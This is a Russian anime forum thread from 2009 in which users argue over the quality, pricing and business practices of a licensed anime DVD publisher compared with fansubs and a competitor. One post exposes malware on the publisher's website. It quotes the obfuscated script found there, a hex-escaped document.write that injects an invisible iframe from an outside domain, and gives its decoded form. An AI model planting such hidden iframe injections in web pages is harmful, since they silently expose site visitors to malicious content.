Deimos Опубликовано 27 апреля, 2009 Жалоба Опубликовано 27 апреля, 2009 (изменено) Для меня МС и состоит из таких частностей. Ни одного по-настоящему хорошего и достойного релиза от МС(по соотношению цена-качества) для себя я не знаю. Притом, что МС лицензировало немало интим релине тайтлов, часть из которых были куплены и оценены на удовлетворительно, часть были разочарованием и потраченными деньгами в некоторой мере(иногда со "скидкой", мол все же "аниме", иногда и скидка не проходила, диски выбрасывались как второсорт, хотя это к более ранним релизам относится), а другую часть(Эрго Прокси) было решено не покупать, потому что все равно переплата(по деньгам) и смотреть/пересматривать в таком виде(качество от МС) я особого смысла не видел. То есть вот я по своим критериям оценки релиза просто не вижу положительных примеров у МС. Поэтому для меня это не частность вовсе.Релизы МС, всё-таки, в большинстве своём, превосходят по качеству фансаб. Учтём, в дополнение к этому, "религиозный" лицензионный фактор и ряд немаловажных доп. возможностей, типа, неоднократно отмеченной мной, возможности просмотра на TV и/или с русским звуком, и получим более чем достаточно оснований для их покупки. Во всяком случае, мне этих оснований, действительно, хватает. И о потраченных на диски деньгах я, как-правило, ничуть не жалею.Зависит от позиции, кто-то говорит, кто-то молчит. Кто-то хавает и давится, кто-то хавает и доволен, кто-то не хавает вообще, кто-то хавает немного.Вот чего я, видимо, никогда не пойму, так это того, зачем "хавать" и давится, если недоволен. Даже немного. Всегда есть чуть менее качественный (как правило), но при этом "практически бесплатный" корм. ^^ Или более дорогая и изысканная (возможно) заграничная кормёжка. Misteria © Osaka Изменено 27 апреля, 2009 пользователем Deimos (смотреть историю редактирования) Цитата
Напротив Опубликовано 27 апреля, 2009 Жалоба Опубликовано 27 апреля, 2009 (изменено) Ardeur, вы неумолимо уперты -_-Это ты упустил(возможно, в "таинственном флудо-посте" есть объяснение, да... ).Разочарую, не упустил. Вам ответил Deimos "истиной", а я за очевидностью не стал комментировать. Фраза конечна. Потому что исходы "для тебя", "для меня" не располагают к обсуждению. Точнее говоря, там нечего обсуждать, но я у вас на поводу пошел. Больше не пойду. Совсем отвлекаясь. Люди всегда свое мнение высказывают независимо от наличия вспомогательного пояснения "имхо", пытаясь свести его в общность, апеллируют к объективности, но здесь, наоборот, и как только в эфире звучат слова личностного обособления, я словно белый взмывающий флажок вижу, - настолько это безотказно работает, тут никакая бравада уже не спасает. И бесконечная вереница "для тебя - возможно" и есть вода, флуд, скучный, скушный в самом дурном смысле этого слова, ибо недосягаем собеседник в своем домике. Вылазьте. Изменено 27 апреля, 2009 пользователем Tere (смотреть историю редактирования) Цитата
Eruialath Опубликовано 27 апреля, 2009 Автор Жалоба Опубликовано 27 апреля, 2009 Я вот не готов заключить, что у МС норма рентабельности выше(если ты об IRR). Более того, есть факты, которые могут говорить об обратном. То есть, условно говоря, МС штампует много(по штукам), потому что не отрабатывает лицензию(говоря терминами, - инвестиции) на должном уровне доходности, поэтому это приходится компенсировать объемом инвестиций(своеобразная реализация "пузыря").Из того, что было сказано об "ухудшении ситуации на рынке" Федоткиным я заключаю, что МС закупает лицензии на существенно других условиях (читай: дешевле), чем их конкуренты. Т.е. в плане отчислений по крайней мере затраты их ниже должны быть. Далее. Дизайн сведён к минимуму, причём и тот минимум, который был (по крайней мере год назад, когда я внимательно его разглядывал; про новые релизы - не уверен) - копеечный. Какой-то из релизов побитово с американским изданием совпадает (если кто подкинет ссылочку на сравнение - буду благодарен, не зафиксировал в своё время). Войсовер отдан на аутсорс. Я вижу тут очень много статей, на которых сэкономили, просто снизив себестоимость. При этом цена - на общем уровне. Мне кажется, можно смело утверждать, что мера рентабельности выше. Хотя, конечно, остаётся почти невероятная возможность, сто МС заключили какие-то кабальные договора с сетями распространения и те все деньги себе гребут. (Заметь, сколько штук они продают - совершенно индифферентно к проценту добавленной стоимости. В перспективе, скорее всего, планируется продать все выпущенные диски, так что теипы продаж на рентабельность (насколько я могу судить, не имея экономического образования) не влияют.)Ведь не просто же так рабочий цикл МС(работа на релизом) не сильно отличается от таковой у РеА.Достаточно сильно, насколько могу судить. В одном случае своя студия и штатный арт-директор, в другом - субподряд озвучки и, я подозреваю, дизайнер-фрилансер.Я сам думаю, что тут дело без "этики" не обходится.По совокупности сказанного, мне трудно сделать иные выводы. Я отчётливо вижу, как вполне определённая этика, сформировавшаяся на заре распада Совка довлеет в головах наших предпринимателей. Практически во всех областях. Например, ещё давно, когда обсуждалась политика МС, я отмечал, что самым слабым моментом является общение с потребителями (пресловутый "пиар", под которым у нас, почему-то тупо понимают рекламу). С тех пор общение свелось практически на нет, и единственный рецидив, который был - тот самый, о котором так много говорят. И то это скорее было ближе к маркетинговому исследованию, потому что результатом было не столько улучшение имиджа компании в заинтересованных кругах, сколько испытание нового форм-фактора ("Афросамурай"). Западные компании очень пекутся о своей репутации, у нас же, в основном, такого понятия в головах дельцов не существует вовсе. Всё это результат катастрофичности внутренней политики (смена строя) и вытекающее из неё следствие - молодость нынешних компаний. Репутация работает на больших промежутках времени. Ещё как-то несерьёзно писать: "работаем с 1991-го года". Это совсем недавно было. И многое этим обусловлено.Вот, кстати, имхо "закрытость" российского бизнеса информационная очень способствует слабому развитию бизнесс-этики, уже много раз об этом говорил. В Европе США очень много данных о зарплатах, о тратах и доходах компании открыты, их можно почитать, оценить. В РФ сплошные "коммерческие тайны". Я думаю "хорошую вещь - тайной не назовут"))Открытость экономики - есть следствие эволюции, которая отладила процессы на всех уровнях. В нашей угрюмой президентской монархии с многочисленными должностными злоупотреблениями на местах совсем честно вести бизнес весьма сложно. Принципиально сложнее, чем иным способом (всё ещё). Поэтому большая часть оборота в тени, и это развращает, как ничто другое. Как можно гордится безупречной репутацией, если все (в индустрии хотя бы) знают, что вот ту, вот тут и вот тут ты смухлевал, да и они - тоже? Поэтому репутация отправляется прямиком в задницу, а её место в вопросе влияния занимает реклама-агитация.Да, кстати открытости бизнес-процессов ещё очень хорошо способствует наличие у компании продающихся акций. Тут благосостояние напрямую на открытость завязано (благоприятное впечатление акционеров, которые знают, во что вкладываются). Ну и общей потребительской культуры не хватает, которая, конечно, нарастёт, если не будет революции, войны и т.п.И бесконечная вереница "для тебя - возможно" и есть вода, флуд, скучный, скушный в самом дурном смысле этого слова, ибо недосягаем собеседник в своем домике. Вылазьте.Из домика "допустимый уровень качества" невозможно вылезти в силу его изначальной субъективности. Как из души не вылезешь. Что обсуждать-то? Тугость крепления в ньютонах? Сопромат на примере коробочек? Количество красок в буклетах (всегда 4 без вариантов)? Цитата
Напротив Опубликовано 28 апреля, 2009 Жалоба Опубликовано 28 апреля, 2009 Из домика "допустимый уровень качества" невозможно вылезти в силу его изначальной субъективности. *мрачно* вы смеетесь что ли? Или здесь вопрос принципа?Из домика "допустимый уровень качества", как и из любого другого субъективного суждения нам всем приходится вылазить постоянно и на протяжении всей своей жизни. Резонность ваших слов как раз и определяется их объективностью, грубо говоря, этой заведомо несостоявшейся попыткой дать оценку предложенную к рассмотрению другому человеку.Попытка же насаждения своего мнения и защиты его как состоявшегося и на каждое возражение закрываться как щитом "это мое\всего лишь твое мнение" – может расцениваться только как упражнение в словесной беллетристике, потому как налицо движение в обратную сторону. От общности к частному. С тем же успехом можно открыть блокнот и писать в него, потрясающий эффект достигается. Это ведь правде противопоставляется ложь, а истине – всегда другая, не менее фундаментальная. Ну, правда, объяснять свое виденье можно до потери сознания, но насколько оно состоятельно? Что, помимо объяснений, эти суждения дают? В нашем случае показательно, что MC пока стоит и не особо качается, а значит, ее продукция раскупается. Кем? Ну, судя по словам продвинутого большинства посетившего сей раздел, это должны быть люди далекие от, ведь каждый уважающий себя анимешник знает, что MC – это быдло от аниме на отечественных началах. Здесь покупатели – случайная выборка по всему "неувлеченному" населению, плюс некоторое количество увлеченных со стороны "фендома" (не хотел употреблять это слово). И, разговор здесь шел не о каком-то рабочем классе, который никто и не защищает, а о причинах, почему продукция MC раскупается. На что немедленно следовал ответ, где сначала постулируется утверждающее "мое" мнение, а потом попытки еще чего-то объяснить недогоняющим. И это даже не хочется комментировать (что, заточенным в долгих спорах умом, воспринимается как молчаливое согласие), ведь прежде чем дать ответ нужно будет говорить о некорректности таких высказываний, что немедленно потянет за собой еще и еще вереницу уточнений и замечаний, окончательно превращая разговор в унылое говно. Времени жаль, да. И именно против подобного я ээээ против. И даже написал:фразу "для тебя" приберегите для более впечатлительных собеседников, она обманчиво уводит разговор в тупик субъективности.Посмотрите, как начиналась прокомментированная вами фраза, разве она противоречит вашим словам? Не понимаю, полагать, что собеседник не отдает отчет своим словам, очень и очень странно. Цитата
Eruialath Опубликовано 28 апреля, 2009 Автор Жалоба Опубликовано 28 апреля, 2009 *мрачно* вы смеетесь что ли? Или здесь вопрос принципа?Нет, здесь вопрос в трактовке слова "допустимый". Я предполагаю, что человек высказывает мнение о "допустимости" для себя лично (всегда). Тут из домика не вылезешь, тут каждый сам себе - мясная избушка. Вам интереснее говорить о "допустимости" в статистически. Такой подход тоже имеет смысл, хотя не кажется мне само собой разумеющимся (даже для издателей). С этой точки зрения можно утверждать, что любой уровень качества, позволяющий компании существовать, является допустимым. Но это не очень интересная классификация, потому что я тогда не знаю "недопустимых" релизов. У Анимедии, например, причина коллапса (если происходящее - это коллапс) лежит за пределами качества продукции. А других релевантных примеров нет. Цитата
Напротив Опубликовано 28 апреля, 2009 Жалоба Опубликовано 28 апреля, 2009 С этой точки зрения можно утверждать, что любой уровень качества, позволяющий компании существовать, является допустимым. Но это не очень интересная классификация, потому что я тогда не знаю "недопустимых" релизов.Вообще говоря, разумно. Не должна приносить прибыть плохая продукция. (Не уверен, что с откровенных говнорелизов MC прибыль имеет.) Но, защищать этот подход я не желаю, уж слишком меня коробит от подобной допустимости. Не все так однозначно можно сравнивать, и, покупка у недомонополиста коробочки с диском даже рядом не валялась с почти безысходностью смирения с качеством работ наших коммунальных служб.Не знаю, насколько интересно писать здесь о низком качестве продуктов MC, форум-то стерпит, и вопрос целесообразности не стоит, но на этом поприще сказать что-то любопытное будет куда труднее. А еще под очень большим вопросом излишне требовательное отношение к вещам сугубо развлекательным. Контуженые онимой плаксы, - с ними-то все ясно, отсутствующая крыша побеждает любое обращение к здравому смыслу, - как бы внятно поясняют, что не хотят тратить деньги на плохое. Что ж, понимаю. И то, что раз делать, то делать хорошо тоже, но, сколько в действительности вам "необходимо" замечательно выполненных работ? Десяток есть? Не так это все и важно, в этом плане мне глубоко симпатично поведение Deimos’а. А вот рассказ о "сугубо личном отношении" хотя в чем-то и верен, но скорее говорит о большом количестве мусора в голове. Но это уже не так интересно. Цитата
Nameless One Опубликовано 30 апреля, 2009 Жалоба Опубликовано 30 апреля, 2009 (изменено) А еще под очень большим вопросом излишне требовательное отношение к вещам сугубо развлекательным.Так практически весь кинематограф, театр и литература относятся к сугубо развлекательным областям. Тот же Властелин Колец, Звездные Войны - вполне себе развлекательные произведения. Но это не значит что надо халтурно к работе относится. В большинстве случаев создатели душу вкладывали в них... а потом их детища попали на г-конвеер федоткина. Не развлекательные это скорее техническая литература, инструкции всякие. P.S. знаю, знаю - видеосервис и последний централ-партнершип еще гаже делают... Изменено 30 апреля, 2009 пользователем Nameless One (смотреть историю редактирования) Цитата
Deimos Опубликовано 30 апреля, 2009 Жалоба Опубликовано 30 апреля, 2009 (изменено) В большинстве случаев создатели душу вкладывали в них...Вот именно уважение к создателям, во многом, и подвигает меня на покупку лицензионных релизов МС (тот самый пресловутый "религиозный" фактор), которые, лично я, вовсе не считаю халтурой, очевидно. Вполне нормальные, среднего уровня издания (в большинстве своём) для просмотра "на каждый день" (в соответствующих количествах). Хотя, "излишне требовательного" отношения (о чём говорил Tere), конечно не удовлетворит... но ведь и Реа, никто не отменял. :)Богу - божье, кесарю - кесарево. © Изменено 30 апреля, 2009 пользователем Deimos (смотреть историю редактирования) Цитата
Йожег-тян Опубликовано 30 апреля, 2009 Жалоба Опубликовано 30 апреля, 2009 (изменено) МодераториалА на тему холиваров по озвучке у нас ведь есть целая отдельная тема, про которую мы забыли, - Выдь на Волгу: чей стон раздаётся? - перенёс сообщения туда, добро, как говорится, пожаловать. Изменено 30 апреля, 2009 пользователем Йожег-тян (смотреть историю редактирования) Цитата
Курама Опубликовано 1 мая, 2009 Жалоба Опубликовано 1 мая, 2009 на сайте mc-ent.ru висит нормальный такой троянчик) желающие могут зайти и убедиться)как думаете - это происки врагов? :) Цитата
Ardeur Опубликовано 1 мая, 2009 Жалоба Опубликовано 1 мая, 2009 Tere, не нужно пустые синтеции выписывать, заменяя ими аргументы(когда сказать по вопросу нечего, высказаться хотя бы о самом оппоненте в споре - отсюда твое "вылазьте"). Мнения в категории субъективизм/объективизм не различаются, какую красивувую аналогию(хоть с белым платком, хоть с фэйспалмом) ты не подбирай. Начинается именно с устраивания или неустраивания личного, а уж только затем идет забота о "рабочем классе"(твой случай) или о "качестве продукции"(мой). Я со своей стороны, аргументов примел неммало, в частности и не субъективных вовсе(сравнение качества и цен РеА и МС - как пример), ты сам их решил пропустить, цеплясь за "мифические флудопосты" и указание на субъективизм. Потому что не по зубам объективные аргументы?Показателен в этом плане спор о пути закупки МС, ты, по глупости, решил, что для всех, кому важно "давать денежку японцам" важно давать именно денежку, в принципе. А ведь нет. Кому-то вполне может быть важно не то "что"(давать), но и "сколько". Речь ведь о деньгах, а они, как известно, счет любят. Не все готовы платить надбавку(завышенная цена на релизы от МС может быть и из-за этого), потому что компания не умеет работать и ей влом работать с картинкой и переводить с японского(делать ре-дизайн и тп). Так просто взял штатовскую лицеху, перевел с инглиша и впарил покупателям. Просто и без стараний особых, да. Что до бизнеса, то появление и развитие РеА(с небольшим количеством релизов даже) уже показывает, что МС, будучи первой, сегмент рынка использует не плотно, а "как придется".Не должна приносить прибыть плохая продукция. (Не уверен, что с откровенных говнорелизов MC прибыль имеет.)Посмеялся. Какая детская наивность. МС делала исключительно говнорелизы первое время и как-то жила, существовала. Про пример видео-издания конца 90х(когда начали активно распространяться первые лицензии) еще можно вспомнить. Вряд ли они столько лет "в убыток" работали. Увы и ах, качество товаров, далеко не всегда определяет успешность на рынке. Поэтому, в частности, и важна этика в бизнесе. Про это Eruialath писал. То что релизы МС всё-таки, в абсолютном большинстве своём, превосходят по качеству фансабЯ этого превосходства на своем опыте не вижу, Deimos. Куплено было дисков 10-15 от МС(за все время), вполне статистически приемлемый "срез". Также, как я уже говорил, я сравниваю фансаб и лицензионное аниме не между собой напрямую(это изначально глупо), а косвенно. Так фансаб - "воровство" в некотором роде и какие бы плюсы у него ни были, этого не исправить. Он незаконен изначально. С другой стороны лицензия - платна(фансаб - бесплатен и делается не профи). Касательно денег и работы МС я все описал уже несколько постов назад. Никак разница качества между РеА и МС в 40 рублей не укладывается. Тем более, МС существует не так уж и мало времени, а релизы которые даже сравнимы с фансабом(без убогости и стыда) начало делать буквально недавно. Хотя бы чисто по техническим характеристикам(то же видео пережатое было еще года полтора-два назад).И о потраченных на диски деньгах я, как-правило, ничуть не жалею.Ну люди деньги ценят по-разному, опять же. Кто-то не жалеет и о покупке изданий от ВидеоСервиса. Чего жалеть, купил - посмотрел - выбросил. Это ж "аниме", а не "священная корова".Вот чего я, видимо, никогда не пойму, так это того, зачем "хавать" и давится, если недоволен. Даже немного. Всегда есть чуть менее качественный (как правило), но при этом "практически бесплатный" корм. ^^ Или более дорогая и изысканная (возможно) заграничная кормёжка. Misteria © OsakaНу я покупаю редкие релизы МС, где ценность тайтла и желание оценить исполнение самому "из первых рук" для меня перевешивают скептицизм. Вот так было с Пэтлэйборами(с "Могилой Светлячков").Кроме этого, вполне возможен вариант, когда кто-то может покупать диски от МС чисто по "религиозным" причинам или из-за невозможности скачать что-то конкретное(например, есть возможность в фансабе качать лишь то, что в локалке, а не из нета). И при этом быть недовольным качеством продукции. Тут первостепенно как человек сам позиционирует качество продукта для себя, для кого-то МС - халтура, для кого низкопроб, для кого- то хороший релиз, для кого-то вообще суперский. Так что причины на "поверхности" вполне. Достаточно сильно, насколько могу судить. В одном случае своя студия и штатный арт-директор, в другом - субподряд озвучки и, я подозреваю, дизайнер-фрилансер.Я говорил только о временных рамках. МС(хотя почти ничего не делает толком) тоже довольно долго обрабатывает отдельный релиз.Из того, что было сказано об "ухудшении ситуации на рынке" Федоткиным я заключаю, что МС закупает лицензии на существенно других условиях (читай: дешевле), чем их конкуренты. Т.е. в плане отчислений по крайней мере затраты их ниже должны быть. Далее. Дизайн сведён к минимуму, причём и тот минимум, который был (по крайней мере год назад, когда я внимательно его разглядывал; про новые релизы - не уверен) - копеечный. Какой-то из релизов побитово с американским изданием совпадает (если кто подкинет ссылочку на сравнение - буду благодарен, не зафиксировал в своё время). Войсовер отдан на аутсорс. Я вижу тут очень много статей, на которых сэкономили, просто снизив себестоимость. При этом цена - на общем уровне. Мне кажется, можно смело утверждать, что мера рентабельности выше. Хотя, конечно, остаётся почти невероятная возможность, сто МС заключили какие-то кабальные договора с сетями распространения и те все деньги себе гребут. (Заметь, сколько штук они продают - совершенно индифферентно к проценту добавленной стоимости. В перспективе, скорее всего, планируется продать все выпущенные диски, так что теипы продаж на рентабельность (насколько я могу судить, не имея экономического образования) не влияют.)Я согласен со многими наблюдениями, но тут все сильно зависит от конкретики. Есть другие вероятности, которые ты не учитываешь. Дело в том, что успешный медиа-бизнес 90х, ВС тот же и Федоткин, в том числе основан на либо отсутствии лицензии как таковой(ТопИндастри - пример), либо закупки ее крайне дешево. Это от того, что лицензия банально не отрабатывается, например, покупают сериал на 50.000 и получают с него 55.000 всего. Договоры с сетями распространения в этом плане нужны как раз для "гарантии"(а гарантия и риск в бизнесе приносят доход разного уровня совершенно), точно сказать сложно, но вполне вероятно, что МС имеет с этих договоров не так уж и много денег. Вспоминается, как-то раз Федоткин(об этом даже тут разговор был) утверждал, что издание хороших релизов аниме не может приносить прибыль вообще. Поэтому именно он делат такие. И многие тогда с умным видом кивали типа "да-да", маленький рынок, низкая платежеспособность и так далее. А потом начали работать XL M и РеА(и как-то жить с небольшим количеством, но качественных изданий). И тут есть две стороны: первая - наврать в расчете на глупость, вторая - Федоткин просто в силу умения не понимает/не знает/не умеет организовывать заработок по иному(то есть когда ты рискуешь и сильно зависишь от реальных продаж товара). Сюда удачно вписывается и отказ от дорогих лицензий(потому что на них мало зарабатывается, а на ПР МС забили). В итоге, есть факты, которые позволяют говорить, что МС вполне вписывается(теоретически) в бизнес-модель с небольшой рентабельностью и заработками за счет больших инвестиций и гарантированной прибыли(те же договора с сетями на выгодных им условиях). Как раз и PR и качество продукта в такой модели напрямую не влияют на ее работу.Что касается расходов МС, то тут тоже есть свои "моменты". Журнал АГ, скорее всего убыточен, магазин в Москве тоже(иначе было бы расширение), московские офисы подороже воронежских и тп. Так что тут как раз вполне вероятен вариант, при котором у РеА прибыльность инвестиций(рентабельность) выше, просто сумма их меньше. И даже прибыль вполне может быть меньше, например, МС, вкладывая 400.000 получает 600.000, а РеА из 150.000 - 300.000. Вот как раз ситуация когда норма рентабельности выше у "РеА", а общий уровень дохода у МС.В остальном, про репутацию и открытость согласен, но, думаю, что в РФ к этому можно "привести" с помощью с "верху"(как многие реформы). Хотя, конечно, это немного утопия, ибо у нас законы в бизнес-среде еще даже похуже, чем сам бизнес. Да и положение дел такое правительству в чем-то и выгодно. Цитата
Nameless One Опубликовано 1 мая, 2009 Жалоба Опубликовано 1 мая, 2009 Я говорил только о временных рамках. МС(хотя почти ничего не делает толком) тоже довольно долго обрабатывает отдельный релиз.Я согласен со многими наблюдениями, но тут все сильно зависит от конкретики. Есть другие вероятности, которые ты не учитываешь. Дело в том, что успешный медиа-бизнес 90х, ВС тот же и Федоткин, в том числе основан на либо отсутствии лицензии как таковой(ТопИндастри - пример), либо закупки ее крайне дешево. Это от того, что лицензия банально не отрабатывается, например, покупают сериал на 50.000 и получают с него 55.000 всего. Договоры с сетями распространения в этом плане нужны как раз для "гарантии"(а гарантия и риск в бизнесе приносят доход разного уровня совершенно), точно сказать сложно, но вполне вероятно, что МС имеет с этих договоров не так уж и много денег. Вспоминается, как-то раз Федоткин(об этом даже тут разговор был) утверждал, что издание хороших релизов аниме не может приносить прибыль вообще. Поэтому именно он делат такие. И многие тогда с умным видом кивали типа "да-да", маленький рынок, низкая платежеспособность и так далее. А потом начали работать XL M и РеА(и как-то жить с небольшим количеством, но качественных изданий). И тут есть две стороны: первая - наврать в расчете на глупость, вторая - Федоткин просто в силу умения не понимает/не знает/не умеет организовывать заработок по иному(то есть когда ты рискуешь и сильно зависишь от реальных продаж товара). Сюда удачно вписывается и отказ от дорогих лицензий(потому что на них мало зарабатывается, а на ПР МС забили). В итоге, есть факты, которые позволяют говорить, что МС вполне вписывается(теоретически) в бизнес-модель с небольшой рентабельностью и заработками за счет больших инвестиций и гарантированной прибыли(те же договора с сетями на выгодных им условиях). Как раз и PR и качество продукта в такой модели напрямую не влияют на ее работу.Что касается расходов МС, то тут тоже есть свои "моменты". Журнал АГ, скорее всего убыточен, магазин в Москве тоже(иначе было бы расширение), московские офисы подороже воронежских и тп. Так что тут как раз вполне вероятен вариант, при котором у РеА прибыльность инвестиций(рентабельность) выше, просто сумма их меньше. И даже прибыль вполне может быть меньше, например, МС, вкладывая 400.000 получает 600.000, а РеА из 150.000 - 300.000. Вот как раз ситуация когда норма рентабельности выше у "РеА", а общий уровень дохода у МС.В остальном, про репутацию и открытость согласен, но, думаю, что в РФ к этому можно "привести" с помощью с "верху"(как многие реформы). Хотя, конечно, это немного утопия, ибо у нас законы в бизнес-среде еще даже похуже, чем сам бизнес. Да и положение дел такое правительству в чем-то и выгодно.Крайне здраво. Цитата
aaSahd0ahthaiNgo Опубликовано 3 мая, 2009 Жалоба Опубликовано 3 мая, 2009 (изменено) на сайте mc-ent.ru висит нормальный такой троянчик) желающие могут зайти и убедиться)как думаете - это происки врагов? :)Нет. Это происки админа данного сайта.Спойлер:Ибо внизу странички вставлен забавный такой код:<script Language='Javascript'> <!-- document.write(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%34%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E')); //--> </Script>Для справки (для тех, кто неспособен понять HEX), этот кусок кода добавляет в страницу следующее:<IFRAME style="WIDTH: 0%; HEIGHT: 0px" src="http://myfucking-pussy.com/tyrek/?t=4" frameBorder=0 scrolling=no allowTransparency></IFRAME> Интересно, что будет дальше? может быть поп-апы и редиректы? Хотя возможно, что данный код появился на странице без ведома владельца. Через вирусню.PSТеперь мое отношение к MC стало сугубо отрицательным.PPSПриношу свои извинения за оффтоп. Изменено 3 мая, 2009 пользователем d06alexandrov (смотреть историю редактирования) Цитата
Deimos Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 (изменено) Я этого превосходства на своем опыте не вижу, Deimos. Куплено было дисков 10-15 от МС(за все время), вполне статистически приемлемый "срез". Также, как я уже говорил, я сравниваю фансаб и лицензионное аниме не между собой напрямую(это изначально глупо), а косвенно. Так фансаб - "воровство" в некотором роде и какие бы плюсы у него ни были, этого не исправить. Он незаконен изначально. С другой стороны лицензия - платна(фансаб - бесплатен и делается не профи). Касательно денег и работы МС я все описал уже несколько постов назад. Никак разница качества между РеА и МС в 40 рублей не укладывается. Тем более, МС существует не так уж и мало времени, а релизы которые даже сравнимы с фансабом(без убогости и стыда) начало делать буквально недавно. Хотя бы чисто по техническим характеристикам(то же видео пережатое было еще года полтора-два назад).Для меня превосходство лицензии (МС) над фансабом очевидно, Ardeur. В чём именно, писал чуть ранее (основываюсь на личном опыте, взглядах и пристрастиях), но спорить здесь бессмысленно, конечно. "Домики" они такие. ^^ У тебя свой, у меня свой.Ну люди деньги ценят по-разному, опять же. Кто-то не жалеет и о покупке изданий от ВидеоСервиса. Чего жалеть, купил - посмотрел - выбросил. Это ж "аниме", а не "священная корова".Ещё одна очевидная истина. Как вполне жизнеспособный вариант: "Кто-то не жалеет и о покупке изданий от ВидеоСервиса. Чего жалеть, купил - посмотрел - выбросил. Это ж издания ВидеСервиса, а не "священная корова". =)Ну я покупаю редкие релизы МС, где ценность тайтла и желание оценить исполнение самому "из первых рук" для меня перевешивают скептицизм. Вот так было с Пэтлэйборами(с "Могилой Светлячков").Кроме этого, вполне возможен вариант, когда кто-то может покупать диски от МС чисто по "религиозным" причинам или из-за невозможности скачать что-то конкретное(например, есть возможность в фансабе качать лишь то, что в локалке, а не из нета). И при этом быть недовольным качеством продукции. Тут первостепенно как человек сам позиционирует качество продукта для себя, для кого-то МС - халтура, для кого низкопроб, для кого- то хороший релиз, для кого-то вообще суперский. Так что причины на "поверхности" вполне.С причинами "на поверхности" всё понятно и вопросов не возникает. У меня вызывают недоумение несколько другие случаи, когда, как хорошо заметил Tere - человек (не конкретный, но таких случаев в теме не мало), явно выражающий свою незаинтересованность в релизах МС, упорно продолжает их "хавать", при этом, естественно, плюясь и ругаясь.Возможно, действительно, мазохизм. =) Изменено 4 мая, 2009 пользователем Deimos (смотреть историю редактирования) Цитата
Напротив Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 С причинами "на поверхности" всё понятно и вопросов не возникает. У меня вызывают недоумение несколько другие случаи, когда, как хорошо заметил Tere - человек (не конкретный, но таких случаев в теме не мало), явно выражающий свою незаинтересованность в релизах МС, упорно продолжает их "хавать", при этом, естественно, плюясь и ругаясь.А вы знаете таких? Именно хавающих и давящихся? Я – нет, ни одного не видел. За исключением умышленного мазохзма, их и быть не может. Ведь живущий где-то там абстрактный потребитель отнюдь не глупее отметившихся здесь, но по умолчанию почему-то предполагается аморфной амебой с замороженными овощами в голове. Разочаровавшиеся делают выводы, и просто перестают покупать. Из наблюдений, отстаивающую остро негативную позицию делают это не из-за жалости и разочарования, -- зачастую они даже ничего не покупают, и если даже и смотрят вытянутое из сети или списанные с чужого харда (это, вообще говоря верно для всех, я вот так делал и делаю), -- а за саму идею противостояния локальному такому злу, которое попирает все светлое. Действительно заслуживают внимания слова тех, кто покупает. Совершенно осмысленно, отдавая себе отчет. Но они явно не давятся. То были просто удобные слова для отстаиваниэ. Цитата
Ardeur Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 Для меня превосходство лицензии (МС) над фансабом очевидно, Ardeur. В чём именно, писал чуть ранее (основываюсь на личном опыте, взглядах и пристрастиях), но спорить здесь бессмысленно, конечно. "Домики" они такие. ^^ У тебя свой, у меня свой.Ну я, очевидно, не Tere, с проповедями о выходе из "домиков". Для меня в данном случае важно как раз то, что превосходят лицензии от МС фансаб относительно субъективно.С причинами "на поверхности" всё понятно и вопросов не возникает. У меня вызывают недоумение несколько другие случаи, когда, как хорошо заметил Tere - человек (не конкретный, но таких случаев в теме не мало), явно выражающий свою незаинтересованность в релизах МС, упорно продолжает их "хавать", при этом, естественно, плюясь и ругаясь.Незаинтересованность именно - это да, странно, но такого, я думаю, нет совсем. А вот если говорить о человек, который выражает мнение о низком качестве продукции МС - вполне. Я уже два варианта назвал(логичных вполне), например, человек без доступа к фансабу(для него это один из немногих выходов) или человек, для которого религиозный фактор перевешивает все остальные намного(среди фанатов - не такая и редкость). При этом люди вполне могут недовольны качеством МС. Если у них соответствующие стандарты восприятия. Цитата
Deimos Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 (изменено) Ну я, очевидно, не Tere, с проповедями о выходе из "домиков". Для меня в данном случае важно как раз то, что превосходят лицензии от МС фансаб относительно субъективно.Ну, это естественно. Более того, превосходство лицензии вообще (и МС, и МА, и, даже, Реа) над фансабом - относительно субъективно, как мы можем легко увидеть почитав соответствующие темы на этом форуме.Ведь живущий где-то там абстрактный потребитель отнюдь не глупее отметившихся здесь, но по умолчанию почему-то предполагается аморфной амебой с замороженными овощами в голове. Разочаровавшиеся делают выводы, и просто перестают покупать.Вот и я так полагал. Однако, видимо, действительно есть люди,для которого религиозный фактор перевешивает все остальные намного(среди фанатов - не такая и редкость). При этом люди вполне могут недовольны качеством МС. Если у них соответствующие стандарты восприятия.Прямо из пословицы: "ёжики плакали и кололись, но продолжали жрать кактус". Всё-таки мазохизм, очевидно. =) Изменено 4 мая, 2009 пользователем Deimos (смотреть историю редактирования) Цитата
Ardeur Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 Более того, превосходство лицензии вообще (и МС, и МА, и, даже, Реа) над фансабом - относительно субъективноНет, как раз превосходство РеА вполне "объективно"(есть отличия объекты-отличия от фансаба/фандаба). Фансаб не предоставляет ни бонусов, ни картинки в ПАЛ Прогрессив, ни дубляжа. Все же, что можно найти на дисках МС - можно скачать в интернете, многоголосый закадровик технологически идентичен фандабу, а разница в "качестве" уже субъективна.Более того, пережатая картинка в релизах GTO - свидетельство того, что МС даже нередко объективно(технологически) уступает уровню фанасаба/нет-рипа.Прямо из пословицы: "ёжики плакали и кололись, но продолжали жрать кактус".Важно, что "другие" ежики едят тот же самый кактус(за 300 рублей), только уже привыкли и не колятся, им даже нравится... Так что мазохизм тут...=) Цитата
